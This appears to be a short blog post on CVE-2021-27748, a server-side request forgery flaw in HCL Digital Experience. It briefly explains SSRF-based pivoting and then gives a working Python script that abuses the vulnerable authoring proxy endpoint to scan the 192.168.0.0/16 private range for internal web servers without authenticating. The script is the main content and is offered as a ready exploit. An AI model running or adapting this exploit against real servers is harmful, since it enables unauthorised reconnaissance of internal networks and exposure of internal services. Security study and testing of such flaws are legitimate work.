Changing the exploit
CVE-2021-27748 is identified as a server-side request forgery (SSRF) vulnerability, affecting IBM WebSphere HCL Digital Experience versions 9.5 and 9.0. While SSRF is commonly associated with external server interactions, this vulnerability also presents a significant risk for internal network exploration by unauthorised users.
Traditionally, SSRF attacks are conceptualised as a method to interact with or exploit external systems. However, CVE-2021-27748 showcases a critical pivot in attacker methodology—using SSRF to enumerate and interact with systems within the internal network. This approach can reveal sensitive internal services and metadata about internal infrastructure or even expose internal-only endpoints and APIs. The script below exploits the CVE as usual but unpacks a private subnet to enumerate internal webservers. This puts us in the internal network., after the authentication wall, but without authenticating
import requests
import ipaddress
headers = {"Sec-Ch-Ua": "", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"\"", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest":
"document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Sec-Gpc": "1", "Referer": "https://www.example.com/wps/PA_WCM_Authoring_UI/proxy/http/127.0.0.1"}
base_network = ipaddress.ip_network('192.168.0.0/16', strict=False)
for testip in base_network.subnets(new_prefix=24):
ip = next(testip.hosts())
url = f"https://www.example:443/wps/PA_WCM_Authoring_UI/proxy/http/{ip}"
try:
response = requests.get(url, headers=headers)
print(f"IP: {ip}, Status Code: {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"Error reaching IP: {ip}. Error: {e}")
Enjoy Reading This Article?
Here are some more articles you might like to read next: